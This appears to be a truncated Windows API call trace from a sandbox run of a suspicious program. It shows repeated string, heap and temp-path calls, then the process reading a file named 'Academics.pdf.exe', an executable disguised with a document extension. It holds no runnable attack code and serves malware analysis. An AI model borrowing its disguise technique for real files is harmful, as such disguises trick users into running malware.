CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.319] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.320] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.321] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.322] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.323] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.324] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.325] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.326] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.327] CharUpperBuffW (in: lpsz="A2200004C22", cchLength=0xb | out: lpsz="A2200004C22") returned 0xb [0133.330] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.330] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/wl.jpg", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", lpFilePart=0x8bedfc*="wl.jpg") returned 0x2b [0133.331] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x178000c, ftCreationTime.dwLowDateTime=0x1, ftCreationTime.dwHighDateTime=0xa70150, ftLastAccessTime.dwLowDateTime=0x821029f, ftLastAccessTime.dwHighDateTime=0x4801db, ftLastWriteTime.dwLowDateTime=0x44a, ftLastWriteTime.dwHighDateTime=0x16d000d, nFileSizeHigh=0x1, nFileSizeLow=0x25c6d68, dwReserved0=0x81e02a0, dwReserved1=0x4, cFileName="\x80", cAlternateFileName="")) returned 0xffffffff [0133.332] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0133.332] GetLastError () returned 0x6 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8ef8 | out: hHeap=0x25c0000) returned 1 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1048 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x249d818 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b0f98 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af660 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8ef8 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1038 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8ef8 | out: hHeap=0x25c0000) returned 1 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24af688 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8ef8 [0133.332] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249d818 | out: hHeap=0x25c0000) returned 1 [0133.332] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.333] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1048 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8c88 | out: hHeap=0x25c0000) returned 1 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e50 | out: hHeap=0x25c0000) returned 1 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d60 | out: hHeap=0x25c0000) returned 1 [0133.333] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d60 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e50 [0133.333] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8c88 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b0f98 [0133.333] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8eb0 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1048 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8e98 [0133.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1048 [0133.334] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8ec8 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8ee0 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8f10 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f28 [0133.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8ec8 | out: hHeap=0x25c0000) returned 1 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8ec8 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1058 [0133.334] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8f40 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0133.334] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1068 [0133.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1058 | out: hHeap=0x25c0000) returned 1 [0133.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0133.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0133.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f28 | out: hHeap=0x25c0000) returned 1 [0133.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8f10 | out: hHeap=0x25c0000) returned 1 [0133.334] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8ec8 | out: hHeap=0x25c0000) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8ee0 | out: hHeap=0x25c0000) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8e98 | out: hHeap=0x25c0000) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8eb0 | out: hHeap=0x25c0000) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1048 [0133.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0133.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8d90 [0133.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8d90 | out: hHeap=0x25c0000) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1048 | out: hHeap=0x25c0000) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0133.335] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b0f98 [0133.335] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=1, lpMultiByteStr=0x24b0f98, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 1 [0133.335] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b0f98 | out: hHeap=0x25c0000) returned 1 [0133.335] GetLastError () returned 0x6 [0133.335] SetLastError (dwErrCode=0x6) [0133.335] GetLastError () returned 0x6 [0133.335] SetLastError (dwErrCode=0x6) [0133.335] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.336] SetLastError (dwErrCode=0x6) [0133.336] GetLastError () returned 0x6 [0133.337] SetLastError (dwErrCode=0x6) [0133.337] GetLastError () returned 0x6 [0133.337] SetLastError (dwErrCode=0x6) [0133.337] GetLastError () returned 0x6 [0133.337] SetLastError (dwErrCode=0x6) [0133.337] GetLastError () returned 0x6 [0133.337] SetLastError (dwErrCode=0x6) [0133.337] GetLastError () returned 0x6 [0133.337] SetLastError (dwErrCode=0x6) [0133.337] GetLastError () returned 0x6 [0133.337] SetLastError (dwErrCode=0x6) [0133.337] GetLastError () returned 0x6 [0133.337] SetLastError (dwErrCode=0x6) [0133.337] GetLastError () returned 0x6 [0133.337] SetLastError (dwErrCode=0x6) [0133.337] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.338] SetLastError (dwErrCode=0x6) [0133.338] GetLastError () returned 0x6 [0133.339] SetLastError (dwErrCode=0x6) [0133.339] GetLastError () returned 0x6 [0133.339] SetLastError (dwErrCode=0x6) [0133.339] GetLastError () returned 0x6 [0133.339] SetLastError (dwErrCode=0x6) [0133.339] GetLastError () returned 0x6 [0133.339] SetLastError (dwErrCode=0x6) [0133.339] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Academics.pdf.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\academics.pdf.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x8beb64, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0133.339] GetFileType (hFile=0x160) returned 0x1 [0133.339] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.340] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0133.340] SetFilePointer (in: hFile=0x160, lDistanceToMove=65516, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffec [0133.340] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, lpNumberOfBytesRead=0x8aeb68*=0x10000, lpOverlapped=0x0) returned 1 [0133.340] SetFilePointer (in: hFile=0x160, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffec [0133.340] SetFilePointer (in: hFile=0x160, lDistanceToMove=131032, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1ffd8 [0133.340] ReadFile (in: hFile=0x160, lpBuffer=0x8aec7c, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8aeb68, lpOverlapped=0x0 | out: lpBuffer=0x8aec7c*, 